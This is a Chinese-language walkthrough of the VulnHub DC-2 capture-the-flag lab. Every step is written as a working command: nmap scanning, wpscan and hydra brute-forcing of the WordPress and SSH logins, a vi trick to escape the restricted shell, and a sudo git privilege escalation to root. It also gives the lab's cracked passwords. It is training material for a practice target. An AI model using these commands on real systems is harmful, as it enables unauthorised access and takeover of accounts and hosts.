0x00 靶機詳情

下載地址：https://download.vulnhub.com/dc/DC-2.zip

根據描述，和DC-1一樣，需要找到5個flag

0x01 靶機練習

nmap探測存活主機

nmap -sP 192.168.217.0/24

查到靶機ip為192.168.217.130

nmap掃描開放埠

nmap -A -T4 -p- 192.168.217.130

開放了80(http)和7744(ssh)埠

訪問靶機主頁

找到Flag1

根據提示，需要使用Cewl工具製作密碼字典，登入後檢視下一個flag

使用Cewl生成密碼字典

cewl dc-2 -w dc2pass.txt

網站使用的CMS是wordpress，可以使用wpscan工具對該CMS進行掃描

使用wpscan掃描網站使用者

wpscan --url http://dc-2 -e u

發現三個使用者名稱：admin、jerry、tom，使用用這三個使用者名稱生成使用者字典進行爆破

訪問wordpress預設後臺/wp-login.php，找到後臺登入介面

使用wpscan爆破使用者密碼

wpscan --url http://dc-2 -U dc2user.txt -P dc2pass.txt 

成功爆破出jerry和tom使用者密碼

使用這兩個使用者進行登入

jerry使用者下找到Flag2

根據提示，需要找到另一個切入點，所以可能需要從另一個7744(ssh)埠入手

使用hydra工具爆破ssh

hydra -L dc2user.txt -P dc2pass.txt  -vV 192.168.217.130  -s 7744 ssh

成功爆破出使用者名稱：tom 密碼：parturient

使用tom使用者登入ssh

ssh [email protected] -p 7744

登入ssh後發現 Flag3，cat檢視失敗，發現被限制了。經查詢，需要繞過rbash

Restricted shell繞過

嘗試發現vi可以使用

執行命令

vi 1
:set shell =/bin/sh
:shell（執行完上一條再執行）
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin （設定環境變數）

成功讀取Flag3

提示中提到jerry和su，嘗試切換到jerry使用者

使用之前爆破出的web下jerry使用者密碼：adipiscing 成功登入

在jerry使用者根目錄下，發現Flag4，直接檢視

根據提示需要使用git命令

git提權　

sudo -l　　　　　　　　　　#檢視可以使用root許可權無密碼的命令
sudo git help config　　#提權
!/bin/sh

成功提權

在根目錄發現最終Flag